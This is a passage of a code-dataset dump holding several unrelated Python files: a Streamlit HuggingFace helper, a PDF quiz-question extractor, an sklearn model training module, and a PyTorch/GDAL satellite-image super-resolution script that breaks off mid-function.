st.error(response.text, icon=\"🚨\")\n return []\n\n output.append(response.json())\n\n st.success(\"Finished querying HuggingFace API successfully!\", icon=\"✅\")\n st.caption(\"\")\n\n return output\n\n def get_text(self, sample_input, max_lines):\n \"\"\"Get input text.\"\"\"\n input_text = st.text_area(\"Enter input keyphrases\", sample_input, height=150)\n\n text_lines = input_text.split(\"\\n\") # a list of lines\n text_lines = list(dict.fromkeys(text_lines)) # remove dubplicates and empty\n text_lines = list(filter(None, text_lines))\n\n if len(text_lines) > max_lines:\n st.info(f\"❄️ Only the first {max_lines} keyphrases are used.\")\n text_lines = text_lines[:max_lines]\n\n return text_lines\n","repo_name":"hvthaibk/huggingface_streamlit","sub_path":"src/hf_tasks.py","file_name":"hf_tasks.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22778022985","text":"# Importing the json, PyPDF2 \nimport json\nimport PyPDF2\nimport re\nwith open(\"The_Living_World.pdf\",'rb') as file: #you can always save the pdf file in same folder and check the rename\n pdf_reader=PyPDF2.PdfFileReader(file)\n entire_pdf=''\n # checking the range for all the pages and extract the test after reading all the texts\n for i in range(pdf_reader.numPages):\n entire_pdf=entire_pdf+pdf_reader.getPage(i).extractText()\n# regular expression\nregx=r'([0-9]+\\.[a-zA-Z\\s\\.\\?\\-\\/,\\(\\)______‘’\\[\\]&\\[AIPMT (Prelims)-2007\\]\\[NEET (Phase 2)-2016\\]NEET 2013:]+)\\(1\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)\\(2\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)\\(3\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)\\(4\\)([a-zA-Z\\s\\-–,’\\'\\\";\\(\\)—“”0-9×&]+)Sol\\.Answer \\(([0-4])\\)'\n\nans=re.findall(regx,entire_pdf)\n\n# saving the results\nresult=[]\nfor i in range(len(ans)):\n temp=[]\n for j in range(6):\n temp.append(ans[i][j].replace('\\n',''))\n result.append(temp)\ndata=[]\nfor i in result:\n data.append({'question':i[0],'option1':i[1],'option2':i[2],'option3':i[3],'option4':i[4],'answer':i[5]})\n # saving the output results in the final.json file you can also rename this\nwith open('final.json','w') as outfile:\n json.dump(data,outfile,indent=4)\n # printing the results\nprint(result)\n","repo_name":"PappuKP/pdf_to_extract_que_ans","sub_path":"pdf_reader.py","file_name":"pdf_reader.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"21247289364","text":"import pickle\nfrom typing import Dict, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score, accuracy_score\n\nfrom src.entities.model_params import ModelParams\n\nClassifier = Union[LogisticRegression, RandomForestClassifier]\n\n\ndef train_model(\n features: pd.DataFrame, target: pd.Series, model_params: ModelParams,\n) -> Classifier:\n if model_params.model_type == \"LogisticRegression\":\n model = LogisticRegression(\n C=model_params.inv_regularization_strength,\n solver=\"liblinear\",\n intercept_scaling=model_params.intercept_scaling,\n )\n elif model_params.model_type == \"RandomForestClassifier\":\n model = RandomForestClassifier(\n n_estimators=model_params.n_estimators,\n random_state=model_params.random_state,\n )\n else:\n raise NotImplementedError()\n model.fit(features, target)\n return model\n\n\ndef predict_model(model: Classifier, features: pd.DataFrame) -> np.ndarray:\n return model.predict(features)\n\n\ndef evaluate_model(preds: np.ndarray, target: pd.Series) -> Dict[str, float]:\n return {\n \"f1_score\": f1_score(target, preds),\n \"acc_score\": accuracy_score(target, preds),\n }\n\n\ndef dump_model(model: LogisticRegression, output: str) -> str:\n with open(output, \"wb\") as f:\n pickle.dump(model, f)\n return output\n\n\ndef load_model(input: str) -> Classifier:\n with open(input, \"rb\") as f:\n model = pickle.load(f)\n return model\n","repo_name":"made-ml-in-prod-2021/truengineer","sub_path":"ml_project/src/models/model_fit_predict.py","file_name":"model_fit_predict.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27023620470","text":"# -*- coding:utf-8 -*-\r\n# author Jin Weishi -*-\r\n\r\nfrom __future__ import absolute_import\r\nfrom __future__ import print_function\r\nfrom __future__ import division\r\n\r\nimport sys\r\nimport os\r\nsys.path.append(\"../\")\r\n\r\nfrom Tools.lib.config import config\r\nfrom Tools.lib.config import update_config\r\nfrom Tools.lib.models.seg_hrnet import get_seg_model\r\nfrom Tools.lib.datasets.cityscapes_cpu import Cityscapes\r\nfrom Tools.lib.utils.utils import get_world_size\r\nimport torch.distributed as dist\r\nfrom tqdm import tqdm\r\nfrom torch.nn import functional as F\r\n# sys.path.append(\"../\")\r\nimport tensorflow as tf\r\nimport cv2\r\nfrom osgeo import osr, gdal\r\n# import gdal\r\nimport warnings\r\nfrom data.io.image_preprocess import short_side_resize_for_inference_data\r\nfrom libs.configs import cfgs\r\nfrom libs.networks import build_whole_network,build_whole_network_WV\r\nfrom libs.box_utils import draw_box_in_img\r\nfrom help_utils import tools\r\nfrom warnings import simplefilter\r\nimport numpy as np\r\nimport math\r\nimport torch\r\nimport torch.nn as nn\r\nimport shutil\r\nfrom osgeo import gdal\r\nimport logging\r\nfrom collections import OrderedDict\r\nfrom torchvision.utils import make_grid\r\nfrom PIL import Image\r\nimport argparse\r\nimport time\r\nimport pandas as pd\r\nimport requests\r\n#忽略警告信息\r\n# tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\r\n#0 -1 -2 only boxes -1 -1 0 all boxes score and label\r\nNOT_DRAW_BOXES = 0\r\nONLY_DRAW_BOXES = -1\r\nONLY_DRAW_BOXES_WITH_SCORES = -2\r\nsimplefilter(action='ignore', category=FutureWarning)\r\nwarnings.filterwarnings('ignore')\r\n\r\n'''定义深度学习基础功能块'''\r\n####################\r\n# Useful tools\r\n####################\r\ndef act(act_type, inplace=True, neg_slope=0.2, n_prelu=1):\r\n # helper selecting activation\r\n # neg_slope: for leakyrelu and init of prelu\r\n # n_prelu: for p_relu num_parameters\r\n act_type = act_type.lower()\r\n if act_type == 'relu':\r\n layer = nn.ReLU(inplace)\r\n elif act_type == 'leakyrelu':\r\n layer = nn.LeakyReLU(neg_slope, inplace)\r\n elif act_type == 'prelu':\r\n layer = nn.PReLU(num_parameters=n_prelu, init=neg_slope)\r\n else:\r\n raise NotImplementedError('activation layer [{:s}] is not found'.format(act_type))\r\n return layer\r\ndef norm(norm_type, nc):\r\n # helper selecting normalization layer\r\n norm_type = norm_type.lower()\r\n if norm_type == 'batch':\r\n layer = nn.BatchNorm2d(nc, affine=True)\r\n elif norm_type == 'instance':\r\n layer = nn.InstanceNorm2d(nc, affine=False)\r\n else:\r\n raise NotImplementedError('normalization layer [{:s}] is not found'.format(norm_type))\r\n return layer\r\ndef addnoise_cn(x, use_gpu):\r\n if use_gpu:\r\n device=torch.device('cuda')\r\n else:\r\n device=torch.device('cpu')\r\n x = x.cpu()\r\n x = x.numpy()\r\n batchsize, d, m, n = x.shape\r\n x1 = np.zeros((batchsize, d + 1, m, n), dtype=x.dtype)\r\n x1[:, 0:d, :, :] = x\r\n for i in range(0, batchsize):\r\n x1[i, d, :, :] = np.random.random(size=(m, n))\r\n return torch.from_numpy(x1).to(device)\r\ndef addnoise(x, use_gpu):\r\n if use_gpu:\r\n device=torch.device('cuda')\r\n else:\r\n device=torch.device('cpu')\r\n x = x.cpu()\r\n x = x.numpy()\r\n n = np.random.random(size=x.shape)\r\n x = x + 0.1 * n\r\n return torch.from_numpy(x).to(device)\r\ndef pad(pad_type, padding):\r\n # helper selecting padding layer\r\n # if padding is 'zero', do by conv layers\r\n pad_type = pad_type.lower()\r\n if padding == 0:\r\n return None\r\n if pad_type == 'reflect':\r\n layer = nn.ReflectionPad2d(padding)\r\n elif pad_type == 'replicate':\r\n layer = nn.ReplicationPad2d(padding)\r\n else:\r\n raise NotImplementedError('padding layer [{:s}] is not implemented'.format(pad_type))\r\n return layer\r\ndef get_valid_padding(kernel_size, dilation):\r\n kernel_size = kernel_size + (kernel_size - 1) * (dilation - 1)\r\n padding = (kernel_size - 1) // 2\r\n return padding\r\nclass ConcatBlock(nn.Module):\r\n # Concat the output of a submodule to its input\r\n def __init__(self, submodule):\r\n super(ConcatBlock, self).__init__()\r\n self.sub = submodule\r\n\r\n def forward(self, x):\r\n output = torch.cat((x, self.sub(x)), dim=1)\r\n return output\r\n\r\n def __repr__(self):\r\n tmpstr = 'Identity .. \\n|'\r\n modstr = self.sub.__repr__().replace('\\n', '\\n|')\r\n tmpstr = tmpstr + modstr\r\n return tmpstr\r\nclass ShortcutBlock(nn.Module):\r\n # Elementwise sum the output of a submodule to its input\r\n def __init__(self, submodule):\r\n super(ShortcutBlock, self).__init__()\r\n self.sub = submodule\r\n\r\n def forward(self, x):\r\n output = x + self.sub(x)\r\n return output\r\n\r\n def __repr__(self):\r\n tmpstr = 'Identity + \\n|'\r\n modstr = self.sub.__repr__().replace('\\n', '\\n|')\r\n tmpstr = tmpstr + modstr\r\n return tmpstr\r\ndef sequential(*args):\r\n # Flatten Sequential. It unwraps nn.Sequential.\r\n if len(args) == 1:\r\n if isinstance(args[0], OrderedDict):\r\n raise NotImplementedError('sequential does not support OrderedDict input.')\r\n return args[0] # No sequential is needed.\r\n modules = []\r\n for module in args:\r\n if isinstance(module, nn.Sequential):\r\n for submodule in module.children():\r\n modules.append(submodule)\r\n elif isinstance(module, nn.Module):\r\n modules.append(module)\r\n return nn.Sequential(*modules)\r\ndef conv_block(in_nc, out_nc, kernel_size, stride=1, dilation=1, groups=1, bias=True, \\\r\n pad_type='zero', norm_type=None, act_type='relu', mode='CNA'):\r\n '''\r\n Conv layer with padding, normalization, activation\r\n mode: CNA --> Conv -> Norm -> Act\r\n NAC --> Norm -> Act --> Conv (Identity Mappings in Deep Residual Networks, ECCV16)\r\n '''\r\n assert mode in ['CNA', 'NAC', 'CNAC'], 'Wong conv mode [{:s}]'.format(mode)\r\n padding = get_valid_padding(kernel_size, dilation)\r\n p = pad(pad_type, padding) if pad_type and pad_type != 'zero' else None\r\n padding = padding if pad_type == 'zero' else 0\r\n c = nn.Conv2d(in_nc, out_nc, kernel_size=kernel_size, stride=stride, padding=padding, \\\r\n dilation=dilation, bias=bias, groups=groups)\r\n a = act(act_type) if act_type else None\r\n if 'CNA' in mode:\r\n if norm_type == 'weight':\r\n return c\r\n else:\r\n n = norm(norm_type, out_nc) if norm_type else None\r\n return sequential(p, c, n, a)\r\n elif mode == 'NAC':\r\n if norm_type is None and act_type is not None:\r\n a = act(act_type, inplace=False)\r\n # Important!\r\n # input----ReLU(inplace)----Conv--+----output\r\n # |________________________|\r\n # inplace ReLU will modify the input, therefore wrong output\r\n n = norm(norm_type, in_nc) if norm_type else None\r\n return sequential(n, a, p, c)\r\n####################\r\n# Useful blocks\r\n####################\r\nclass ResNetBlock(nn.Module):\r\n '''\r\n ResNet Block, 3-3 style\r\n with extra residual scaling used in EDSR\r\n (Enhanced Deep Residual Networks for Single Image Super-Resolution, CVPRW 17)\r\n '''\r\n\r\n def __init__(self, in_nc, mid_nc, out_nc, kernel_size=3, stride=1, dilation=1, groups=1, \\\r\n bias=True, pad_type='zero', norm_type=None, act_type='relu', mode='CNA', res_scale=1):\r\n super(ResNetBlock, self).__init__()\r\n conv0 = conv_block(in_nc, mid_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n norm_type, act_type, mode)\r\n if mode == 'CNA':\r\n act_type = None\r\n if mode == 'CNAC': # Residual path: |-CNAC-|\r\n act_type = None\r\n norm_type = None\r\n conv1 = conv_block(mid_nc, out_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n norm_type, act_type, mode)\r\n # if in_nc != out_nc:\r\n # self.project = conv_block(in_nc, out_nc, 1, stride, dilation, 1, bias, pad_type, \\\r\n # None, None)\r\n # print('Need a projecter in ResNetBlock.')\r\n # else:\r\n # self.project = lambda x:x\r\n self.res = sequential(conv0, conv1)\r\n self.res_scale = res_scale\r\n\r\n def forward(self, x):\r\n res = self.res(x).mul(self.res_scale)\r\n return x + res\r\nclass ResNetBlock_wn(nn.Module):\r\n '''\r\n ResNet Block, 3-3 style\r\n with extra residual scaling used in EDSR\r\n (Enhanced Deep Residual Networks for Single Image Super-Resolution, CVPRW 17)\r\n '''\r\n\r\n def __init__(self, in_nc, mid_nc, out_nc, kernel_size=3, stride=1, dilation=1, groups=1, \\\r\n bias=True, pad_type='zero', norm_type='weight', act_type='relu', mode='CNA', res_scale=1):\r\n super(ResNetBlock_wn, self).__init__()\r\n\r\n act_type = None\r\n # norm_type = None\r\n # 定义基础卷积层0\r\n conv0 = conv_block(in_nc, mid_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n norm_type, act_type, mode)\r\n # 定义基础卷积层1\r\n conv1 = conv_block(mid_nc, out_nc, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n norm_type, act_type, mode)\r\n # 定义激活层\r\n act = nn.ReLU(True)\r\n # 定义归一化函数\r\n wn = lambda x: torch.nn.utils.weight_norm(x)\r\n res = []\r\n res.append(\r\n wn(conv0)\r\n )\r\n res.append(act)\r\n res.append(wn(conv1))\r\n # if mode == 'CNA':\r\n # act_type = None\r\n # if mode == 'CNAC': # Residual path: |-CNAC-|\r\n # act_type = None\r\n # norm_type = None\r\n # conv1 = conv_block(mid_nc*3, out_nc/2, kernel_size, stride, dilation, groups, bias, pad_type, \\\r\n # norm_type, act_type, mode)\r\n # if in_nc != out_nc:\r\n # self.project = conv_block(in_nc, out_nc, 1, stride, dilation, 1, bias, pad_type, \\\r\n # None, None)\r\n # print('Need a projecter in ResNetBlock.')\r\n # else:\r\n # self.project = lambda x:x\r\n self.res = nn.Sequential(*res)\r\n self.res_scale = res_scale\r\n\r\n def forward(self, x):\r\n res = self.res(x).mul(self.res_scale)\r\n return x + res\r\n####################\r\n# Upsampler\r\n####################\r\ndef pixelshuffle_block(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=None, act_type='relu'):\r\n '''\r\n Pixel shuffle layer\r\n (Real-Time Single Image and Video Super-Resolution Using an Efficient Sub-Pixel Convolutional\r\n Neural Network, CVPR17)\r\n '''\r\n conv = conv_block(in_nc, out_nc * (upscale_factor ** 2), kernel_size, stride, bias=bias, \\\r\n pad_type=pad_type, norm_type=None, act_type=None)\r\n pixel_shuffle = nn.PixelShuffle(upscale_factor)\r\n\r\n n = norm(norm_type, out_nc) if norm_type else None\r\n a = act(act_type) if act_type else None\r\n return sequential(conv, pixel_shuffle, n, a)\r\ndef upconv_blcok(in_nc, out_nc, upscale_factor=2, kernel_size=3, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=None, act_type='relu', mode='nearest'):\r\n # Up conv\r\n # described in https://distill.pub/2016/deconv-checkerboard/\r\n upsample = nn.Upsample(scale_factor=upscale_factor, mode=mode)\r\n conv = conv_block(in_nc, out_nc, kernel_size, stride, bias=bias, \\\r\n pad_type=pad_type, norm_type=norm_type, act_type=act_type)\r\n return sequential(upsample, conv)\r\n\r\n'''定义超分基础模型框架'''\r\n'''SRGAN'''\r\nclass SRResNet(nn.Module):\r\n def __init__(self, in_nc, out_nc, nf, nb, upscale=4, norm_type='batch', act_type='relu', \\\r\n mode='CAN', res_scale=1, upsample_mode='pixelshuffle'):\r\n super(SRResNet, self).__init__()\r\n n_upscale = int(math.log(upscale, 2))\r\n if upscale == 3:\r\n n_upscale = 1\r\n\r\n fea_conv = conv_block(in_nc, nf, kernel_size=3, norm_type=None, act_type=None)\r\n resnet_blocks = [ResNetBlock(nf, nf, nf, norm_type=norm_type, act_type=act_type,\\\r\n mode=mode, res_scale=res_scale) for _ in range(nb)]\r\n LR_conv = conv_block(nf, nf, kernel_size=3, norm_type=norm_type, act_type=None, mode=mode)\r\n\r\n if upsample_mode == 'upconv':\r\n upsample_block = upconv_blcok\r\n elif upsample_mode == 'pixelshuffle':\r\n upsample_block = pixelshuffle_block\r\n else:\r\n raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))\r\n if upscale == 3:\r\n upsampler = upsample_block(nf, nf, 3, act_type=act_type)\r\n else:\r\n upsampler = [upsample_block(nf, nf, act_type=act_type) for _ in range(n_upscale)]\r\n HR_conv0 = conv_block(nf, nf, kernel_size=3, norm_type=None, act_type=act_type)\r\n HR_conv1 = conv_block(nf, out_nc, kernel_size=3, norm_type=None, act_type=None)\r\n\r\n self.model = sequential(fea_conv, ShortcutBlock(sequential(*resnet_blocks, LR_conv)),\\\r\n *upsampler, HR_conv0, HR_conv1)\r\n\r\n def forward(self, x):\r\n x = self.model(x)\r\n return x\r\n'''SRGAN_Noise'''\r\nclass SRResNet_Noise(nn.Module):\r\n def __init__(self, in_nc, out_nc, nf, nb, upscale=4, norm_type='batch', act_type='relu', \\\r\n mode='CAN', res_scale=1, upsample_mode='pixelshuffle', use_gpu=True):\r\n super(SRResNet_Noise, self).__init__()\r\n self.use_gpu = use_gpu\r\n n_upscale = int(math.log(upscale, 2))\r\n if upscale == 3:\r\n n_upscale = 1\r\n\r\n fea_conv = conv_block(in_nc+1, nf, kernel_size=3, norm_type=None, act_type=None)\r\n resnet_blocks = [ResNetBlock(nf, nf, nf, norm_type=norm_type, act_type=act_type,\\\r\n mode=mode, res_scale=res_scale) for _ in range(nb)]\r\n LR_conv = conv_block(nf, nf, kernel_size=3, norm_type=norm_type, act_type=None, mode=mode)\r\n\r\n if upsample_mode == 'upconv':\r\n upsample_block = upconv_blcok\r\n elif upsample_mode == 'pixelshuffle':\r\n upsample_block = pixelshuffle_block\r\n else:\r\n raise NotImplementedError('upsample mode [{:s}] is not found'.format(upsample_mode))\r\n if upscale == 3:\r\n upsampler = upsample_block(nf, nf, 3, act_type=act_type)\r\n else:\r\n upsampler = [upsample_block(nf, nf, act_type=act_type) for _ in range(n_upscale)]\r\n HR_conv0 = conv_block(nf, nf, kernel_size=3, norm_type=None, act_type=act_type)\r\n HR_conv1 = conv_block(nf, out_nc, kernel_size=3, norm_type=None, act_type=None)\r\n\r\n self.model = sequential(fea_conv, ShortcutBlock(sequential(*resnet_blocks, LR_conv)),\\\r\n *upsampler, HR_conv0, HR_conv1)\r\n\r\n def forward(self, x):\r\n# noise = torch.randn(x.shape[1:4], device='cuda')\r\n x = addnoise_cn(x, self.use_gpu)\r\n x = self.model(x)\r\n return x\r\n'''WDSR'''\r\nclass WDSRNet(nn.Module):\r\n def __init__(self, in_nc, out_nc, nf, nb, upscale=4, norm_type='weight', act_type='relu', \\\r\n mode='CAN', res_scale=1, upsample_mode='pixelshuffle'):\r\n super(WDSRNet, self).__init__()\r\n wn = lambda x: torch.nn.utils.weight_norm(x)\r\n head=[]\r\n body=[]\r\n tail=[]\r\n skip=[]\r\n head.append(\r\n wn(nn.Conv2d(in_nc, nf//2, 3, padding=3//2)))\r\n for _ in range(nb):\r\n body.append(ResNetBlock_wn(nf//2, nf*3, nf//2, norm_type=norm_type, act_type=act_type,\\\r\n mode=mode, res_scale=res_scale))\r\n out_feats = upscale*upscale*out_nc\r\n tail.append(\r\n wn(conv_block(nf//2, out_feats, kernel_size=3, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=norm_type, act_type=None))\r\n )\r\n tail.append(nn.PixelShuffle(upscale))\r\n skip.append(\r\n wn(conv_block(in_nc, out_feats, kernel_size=5, stride=1, bias=True, \\\r\n pad_type='zero', norm_type=norm_type, act_type=None))\r\n )\r\n skip.append(nn.PixelShuffle(upscale))\r\n self.head = nn.Sequential(*head)\r\n self.body = nn.Sequential(*body)\r\n self.tail = nn.Sequential(*tail)\r\n self.skip = nn.Sequential(*skip)\r\n\r\n def forward(self, x):\r\n s=self.skip(x)\r\n x=self.head(x)\r\n x=self.body(x)\r\n x=self.tail(x)\r\n x += s\r\n return x\r\n\r\n\r\n'''定义基础超分框架'''\r\nclass BaseModel():\r\n def __init__(self, load_path, modeltype, use_gpu):\r\n self.use_gpu=use_gpu\r\n if self.use_gpu:\r\n self.device = torch.device('cuda')\r\n else:\r\n self.device = torch.device('cpu')\r\n# self.is_train = opt['is_train']\r\n# self.device = torch.device('cpu')\r\n self.schedulers = []\r\n self.optimizers = []\r\n self.load_path=load_path\r\n\r\n def feed_data(self, data):\r\n pass\r\n\r\n def optimize_parameters(self):\r\n pass\r\n\r\n def get_current_visuals(self):\r\n pass\r\n\r\n def get_current_losses(self):\r\n pass\r\n\r\n def print_network(self):\r\n pass\r\n\r\n def save(self, label):\r\n pass\r\n\r\n def load(self):\r\n pass\r\n\r\n def update_learning_rate(self):\r\n for scheduler in self.schedulers:\r\n scheduler.step()\r\n\r\n def get_current_learning_rate(self):\r\n return self.schedulers[0].get_lr()[0]\r\n\r\n def get_network_description(self, network):\r\n '''Get the string and total parameters of the network'''\r\n if isinstance(network, nn.DataParallel):\r\n network = network.module\r\n s = str(network)\r\n n = sum(map(lambda x: x.numel(), network.parameters()))\r\n return s, n\r\n\r\n def save_network(self, network, network_label, iter_step):\r\n save_filename = '{}_{}.pth'.format(iter_step, network_label)\r\n save_path = os.path.join(self.opt['path']['models'], save_filename)\r\n if isinstance(network, nn.DataParallel):\r\n network = network.module\r\n state_dict = network.state_dict()\r\n for key, param in state_dict.items():\r\n state_dict[key] = param.cpu()\r\n torch.save(state_dict, save_path)\r\n\r\n def load_network(self, load_path, network, strict=True):\r\n if isinstance(network, nn.DataParallel):\r\n network = network.module\r\n network.load_state_dict(torch.load(load_path), strict=strict)\r\n\r\n def save_training_state(self, epoch, iter_step):\r\n '''Saves training state during training, which will be used for resuming'''\r\n state = {'epoch': epoch, 'iter': iter_step, 'schedulers': [], 'optimizers': []}\r\n for s in self.schedulers:\r\n state['schedulers'].append(s.state_dict())\r\n for o in self.optimizers:\r\n state['optimizers'].append(o.state_dict())\r\n save_filename = '{}.state'.format(iter_step)\r\n save_path = os.path.join(self.opt['path']['training_state'], save_filename)\r\n torch.save(state, save_path)\r\n\r\n def resume_training(self, resume_state):\r\n '''Resume the optimizers and schedulers for training'''\r\n resume_optimizers = resume_state['optimizers']\r\n resume_schedulers = resume_state['schedulers']\r\n assert len(resume_optimizers) == len(self.optimizers), 'Wrong lengths of optimizers'\r\n assert len(resume_schedulers) == len(self.schedulers), 'Wrong lengths of schedulers'\r\n for i, o in enumerate(resume_optimizers):\r\n self.optimizers[i].load_state_dict(o)\r\n for i, s in enumerate(resume_schedulers):\r\n self.schedulers[i].load_state_dict(s)\r\n'''定义超分模型'''\r\nlogger = logging.getLogger('base')\r\nclass Model_Builder(BaseModel):\r\n '''构建网络模型加载框架'''\r\n def __init__(self, load_path, modeltype, use_gpu):\r\n super(Model_Builder, self).__init__(load_path, modeltype, use_gpu)\r\n # define network and load pretrained models\r\n if modeltype=='WDSR':\r\n self.netG = WDSRNet(in_nc=4, out_nc=4, nf=64, nb=23, upscale=4, norm_type='weight', act_type='relu', mode='CNA', upsample_mode='pixelshuffle')\r\n elif modeltype=='SRGAN':\r\n self.netG = SRResNet(in_nc=4, out_nc=4, nf=64, nb=16, upscale=4, norm_type=None, act_type='relu', mode= 'CNA', upsample_mode='pixelshuffle')\r\n elif modeltype=='SRGAN_Noise':\r\n self.netG = SRResNet_Noise(in_nc=4, out_nc=4, nf=64, nb=16, upscale=4, norm_type= None, act_type='relu', mode='CNA', upsample_mode='pixelshuffle', use_gpu=self.use_gpu)\r\n else:\r\n raise NotImplementedError('Model [{:s}] not recognized.'.format(modeltype))\r\n self.netG=self.netG.to(self.device)\r\n self.load()\r\n self.print_network()\r\n\r\n def feed_data(self, data, need_HR=False):\r\n self.var_L = data.to(self.device) # LR\r\n if need_HR:\r\n self.real_H = data['HR'].to(self.device) # HR\r\n\r\n def optimize_parameters(self, step):\r\n self.optimizer_G.zero_grad()\r\n self.fake_H = self.netG(self.var_L)\r\n l_pix = self.l_pix_w * self.cri_pix(self.fake_H, self.real_H)\r\n l_pix.backward()\r\n self.optimizer_G.step()\r\n\r\n # set log\r\n self.log_dict['l_pix'] = l_pix.item()\r\n\r\n def test(self):\r\n self.netG.eval()\r\n with torch.no_grad():\r\n self.fake_H = self.netG(self.var_L)\r\n self.netG.train()\r\n\r\n def test_x8(self):\r\n # from https://github.com/thstkdgus35/EDSR-PyTorch\r\n self.netG.eval()\r\n for k, v in self.netG.named_parameters():\r\n v.requires_grad = False\r\n\r\n def _transform(v, op):\r\n # if self.precision != 'single': v = v.float()\r\n v2np = v.data.cpu().numpy()\r\n if op == 'v':\r\n tfnp = v2np[:, :, :, ::-1].copy()\r\n elif op == 'h':\r\n tfnp = v2np[:, :, ::-1, :].copy()\r\n elif op == 't':\r\n tfnp = v2np.transpose((0, 1, 3, 2)).copy()\r\n\r\n ret = torch.Tensor(tfnp).to(self.device)\r\n # if self.precision == 'half': ret = ret.half()\r\n\r\n return ret\r\n\r\n lr_list = [self.var_L]\r\n for tf in 'v', 'h', 't':\r\n lr_list.extend([_transform(t, tf) for t in lr_list])\r\n sr_list = [self.netG(aug) for aug in lr_list]\r\n for i in range(len(sr_list)):\r\n if i > 3:\r\n sr_list[i] = _transform(sr_list[i], 't')\r\n if i % 4 > 1:\r\n sr_list[i] = _transform(sr_list[i], 'h')\r\n if (i % 4) % 2 == 1:\r\n sr_list[i] = _transform(sr_list[i], 'v')\r\n\r\n output_cat = torch.cat(sr_list, dim=0)\r\n self.fake_H = output_cat.mean(dim=0, keepdim=True)\r\n\r\n for k, v in self.netG.named_parameters():\r\n v.requires_grad = True\r\n self.netG.train()\r\n\r\n def get_current_log(self):\r\n return self.log_dict\r\n\r\n def get_current_visuals(self, need_HR=False):\r\n out_dict = OrderedDict()\r\n out_dict['LR'] = self.var_L.detach()[0].float().cpu()\r\n out_dict['SR'] = self.fake_H.detach()[0].float().cpu()\r\n if need_HR:\r\n out_dict['HR'] = self.real_H.detach()[0].float().cpu()\r\n return out_dict\r\n\r\n def print_network(self):\r\n s, n = self.get_network_description(self.netG)\r\n if isinstance(self.netG, nn.DataParallel):\r\n net_struc_str = '{} - {}'.format(self.netG.__class__.__name__,\r\n self.netG.module.__class__.__name__)\r\n else:\r\n net_struc_str = '{}'.format(self.netG.__class__.__name__)\r\n\r\n logger.info('Network G structure: {}, with parameters: {:,d}'.format(net_struc_str, n))\r\n logger.info(s)\r\n\r\n def load(self):\r\n load_path_G = self.load_path\r\n if load_path_G is not None:\r\n self.load_network(load_path_G, self.netG)\r\n\r\n def save(self, iter_step):\r\n self.save_network(self.netG, 'G', iter_step)\r\n\r\n'''读取卫星影像函数'''\r\ndef read_img(filename):\r\n '''读取带坐标的Tif文件'''\r\n dataset=gdal.Open(filename) #打开文件\r\n\r\n im_width = dataset.RasterXSize #栅格矩阵的列数\r\n im_height = dataset.RasterYSize #栅格矩阵的行数\r\n\r\n im_geotrans = list(dataset.GetGeoTransform()) #仿射矩阵\r\n im_proj = dataset.GetProjection() #地图投影信息\r\n im_data = dataset.ReadAsArray(0,0,im_width,im_height) #将数据写成数组,对应栅格矩阵\r\n\r\n del dataset #清理内存\r\n return im_proj,im_geotrans,im_data\r\n\r\n'''存储卫星影像函数'''\r\ndef write_img(filename,im_proj,im_geotrans,im_data):\r\n '''保存tif文件'''\r\n if 'int8' in im_data.dtype.name:\r\n datatype = gdal.GDT_Byte\r\n elif 'int16' in im_data.dtype.name:\r\n datatype = gdal.GDT_UInt16\r\n else:\r\n datatype = gdal.GDT_Float32\r\n\r\n #判读数组维数\r\n if len(im_data.shape) == 3:\r\n im_bands, im_height, im_width = im_data.shape\r\n else:\r\n im_bands, (im_height, im_width) = 1,im_data.shape\r\n\r\n #创建文件\r\n driver = gdal.GetDriverByName(\"GTiff\") #数据类型必须有,因为要计算需要多大内存空间\r\n dataset = driver.Create(filename, im_width, im_height, im_bands, datatype)\r\n\r\n dataset.SetGeoTransform(im_geotrans) #写入仿射变换参数\r\n dataset.SetProjection(im_proj) #写入投影\r\n\r\n if im_bands == 1:\r\n dataset.GetRasterBand(1).WriteArray(im_data) #写入数组数据\r\n else:\r\n for i in range(im_bands):\r\n dataset.GetRasterBand(i+1).WriteArray(im_data[i])\r\n\r\n del dataset\r\n\r\n'''tensor转遥感影像函数'''\r\ndef tensor2rsimg(tensor, out_type=np.uint8, min_max=(0, 1)):\r\n '''\r\n Converts a torch Tensor into an image Numpy array\r\n Input: 4D(B,(3/1),H,W), 3D(C,H,W), or 2D(H,W), any range, RGB channel order\r\n Output: 3D(H,W,C) or 2D(H,W), [0,255], np.uint8 (default)\r\n '''\r\n tensor = tensor.squeeze().float().cpu().clamp_(*min_max) # clamp\r\n tensor = (tensor - min_max[0]) / (min_max[1] - min_max[0]) # to range [0,1]\r\n n_dim = tensor.dim()\r\n if n_dim == 4:\r\n n_img = len(tensor)\r\n img_np = make_grid(tensor, nrow=int(math.sqrt(n_img)), normalize=False).numpy()\r\n elif n_dim == 3:\r\n img_np = tensor.numpy()\r\n elif n_dim == 2:\r\n img_np = tensor.numpy()\r\n else:\r\n raise TypeError(\r\n 'Only support 4D, 3D and 2D tensor. But received with dimension: {:d}'.format(n_dim))\r\n if out_type == np.uint8:\r\n img_np = (img_np * 255.0).round()\r\n # Important. Unlike matlab, numpy.unit8() WILL NOT round by default.\r\n return img_np.astype(out_type)\r\n\r\n'''影像拉伸函数'''\r\ndef imgstretch(img):\r\n gray=img\r\n d2=np.percentile( gray,2 )\r\n #d2=np.min(gray)\r\n u98=np.percentile( gray,98 )\r\n 